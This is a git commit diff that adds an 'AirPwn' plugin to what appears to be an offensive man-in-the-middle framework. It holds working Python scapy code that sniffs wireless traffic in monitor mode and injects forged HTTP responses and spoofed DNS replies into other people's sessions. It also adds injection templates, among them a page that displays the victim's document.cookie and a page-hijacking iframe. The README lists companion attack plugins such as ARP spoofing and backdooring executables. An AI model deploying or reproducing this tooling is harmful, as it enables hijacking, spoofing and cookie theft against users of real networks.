added airpwn plugin

2025-07-15 01:23:54 -07:00 · 2014-10-31 00:46:43 +01:00 · 2014-10-31 00:46:43 +01:00 · 8ff9c246db
commit 8ff9c246db
parent 8dde6f8c60
12 changed files with 162 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -11,6 +11,7 @@ Availible plugins:
 - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
 - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
 - AppCachePoison - Perform app cache poison attacks 
+- AirPwn - Monitor traffic on an 802.11 network and respond with arbitrary content as configured
 - BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
 - CacheKill - Kills page caching by modifying headers
 - FilePwn - Backdoor executables being sent over http using bdfactory
@ -25,6 +26,8 @@ So far the most significant changes have been:

 - Integrated SSLstrip+ (https://github.com/LeonardoNve/sslstrip2) by Leonardo Nve to partially bypass HSTS as demonstrated at BlackHat Asia 2014 

+- Addition of the AirPwn plugin (Python port of the original project)
+
 - Spoof plugin now supports ICMP, ARP and DHCP spoofing along with DNS tampering
  (DNS tampering code was stolen from https://github.com/DanMcInerney/dnsspoof/)

--- a/config_files/airpwn.cfg
+++ b/config_files/airpwn.cfg
@ -0,0 +1,9 @@
+#Example config for the AirPwn plugin
+
+[site_hijack]
+match = ^(GET|POST).*
+response = ./config_files/airpwn_templates/site_hijack
+
+#[puppy_jpg]
+#match = ^GET [^ ]+\.(?i:jpg|jpeg|gif|png)
+#response = ./config_files/airpwn_templates/puppy_jpg
--- a/config_files/airpwn_templates/README
+++ b/config_files/airpwn_templates/README
@ -0,0 +1,3 @@
+Sample content used by the configurations in the conf/ directory.  See
+the README there for more information.
+
--- a/config_files/airpwn_templates/airpwn_cssbg
+++ b/config_files/airpwn_templates/airpwn_cssbg
@ -0,0 +1,10 @@
+HTTP/1.1 200 OK
+Content-type: text/css
+Content-length: 103
+
+body {
+  background-color: red;
+  background-image: url(/airpwnbg.jpg);
+  background-repeat: repeat;
+}
+  
--- a/config_files/airpwn_templates/airpwned_png
+++ b/config_files/airpwn_templates/airpwned_png
--- a/config_files/airpwn_templates/ftp_resp
+++ b/config_files/airpwn_templates/ftp_resp
@ -0,0 +1,2 @@
+331 FTP IS FUN!!!! ENJOY YOUR DATA!!!
+
--- a/config_files/airpwn_templates/greet_html
+++ b/config_files/airpwn_templates/greet_html
@ -0,0 +1,11 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>HELLO DEFCON!</title>
+</head><body>
+<blink><font size=+5 color=red>
+Hello Defcon! Your wireless network is delicious!
+</font>
+</blink>
+<p>
--- a/config_files/airpwn_templates/js_html
+++ b/config_files/airpwn_templates/js_html
@ -0,0 +1,13 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<html><head><title>pwned</title>
+</head><body onLoad="
+alert('hi');
+alert('you');
+alert('are');
+alert('so');
+alert('owned');
+alert('cookie: ' + document.cookie);">
+
--- a/config_files/airpwn_templates/puppy_jpg
+++ b/config_files/airpwn_templates/puppy_jpg
--- a/config_files/airpwn_templates/site_hijack
+++ b/config_files/airpwn_templates/site_hijack
@ -0,0 +1,15 @@
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+Content-Length: 250
+
+<html>
+  <head><title>hugs</title></head>
+  <body>
+    <iframe frameborder=0 border=0 src="http://google.com" width="100%"
+      height="100%">hugs</iframe>
+    <div style="visibility:hidden;position:absolute;x:-5000;y:-5000;">
+      BYE BYE!
+
+
+<!--
--- a/plugins/AirPwn.py
+++ b/plugins/AirPwn.py
@ -0,0 +1,95 @@
+# Some of this code was stolen from https://jordan-wright.github.io/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/
+
+from plugins.plugin import Plugin
+import threading
+import logging
+import sys
+import re
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
+from scapy.all import *
+
+try:
+    from configobj import ConfigObj
+except:
+    sys.exit('[-] configobj library not installed!')
+
+class AirPwn(Plugin):
+	name = 'Airpwn'
+	optname = 'airpwn'
+	desc = 'Monitor traffic on an 802.11 network and respond with arbitrary content as configured'
+	has_opts = True
+
+	def initialize(self, options):
+		self.options = options
+		self.mon_interface = options.mon_interface
+		self.aircfg = options.aircfg
+		self.dnspwn = options.dnspwn
+
+		if os.geteuid() != 0:
+			sys.exit("[-] AirPwn plugin requires root privileges")
+
+		try:
+			self.aircfg= ConfigObj(self.aircfg)
+		except:
+			sys.exit("[-] Error parsing airpwn config file")
+
+		t = threading.Thread(name='sniff_http_thread', target=self.sniff_http, args=(self.mon_interface,))
+		t.setDaemon(True)
+		t.start()
+
+		if self.dnspwn:
+			t2 = threading.Thread(name='sniff_dns_thread', target=self.sniff_dns, args=(self.mon_interface,))
+			t2.setDaemon(True)
+			t2.start()
+
+	def sniff_http(self, iface):
+		sniff(filter="tcp and port 80", prn=self.http_callback, iface=iface)
+
+	def sniff_dns(self, iface):
+		sniff(filter="udp and port 53", prn=self.dns_callback, iface=iface)
+
+	def http_callback(self, packet):
+		if packet.haslayer(TCP) and packet.haslayer(Raw):
+			for rule in self.aircfg.items():
+				if (re.match(r'%s' % rule[1]['match'], packet[Raw].load)):
+					response = packet.copy()
+					# We need to start by changing our response to be "from-ds", or from the access point.
+					response.FCfield = 2L
+					# Switch the MAC addresses
+					response.addr1, response.addr2 = packet.addr2, packet.addr1
+					# Switch the IP addresses
+					response.src, response.dst = packet.dst, packet.src
+					# Switch the ports
+					response.sport, response.dport = packet.dport, packet.sport
+					response[Raw].load = open(rule[1]['response'], 'r').read()
+
+					sendp(response, iface=self.mon_interface, verbose=False)
+					logging.info("%s >> Replaced content" % response.src)
+
+	def dns_callback(self, packet):
+		if packet.haslayer(UDP) and packet.haslayer(DNS):
+			req_domain = packet[DNS].qd.qname
+			response = packet.copy()
+			response.FCfield = 2L
+			response.addr1, response.addr2 = packet.addr2, packet.addr1
+			response.src, response.dst = packet.dst, packet.src
+			response.sport, response.dport = packet.dport, packet.sport
+			# Set the DNS flags
+			response[DNS].qr = 1L
+			response[DNS].ra = 1L
+			response[DNS].ancount = 1
+			response[DNS].an = DNSRR(
+				rrname = req_domain,
+				type = 'A',
+				rclass = 'IN',
+				ttl = 900,
+				rdata = self.dnspwn
+			)
+
+			sendp(response, iface=self.mon_interface, verbose=False)
+			logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))
+
+	def add_options(self, options):
+		options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
+		options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
+		options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -304,7 +304,7 @@ class Spoof(Plugin):
    def logPrefix(self):
        return 'queue'

-    def add_options(self,options):
+    def add_options(self, options):
        group = options.add_mutually_exclusive_group(required=False)
        group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
        group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')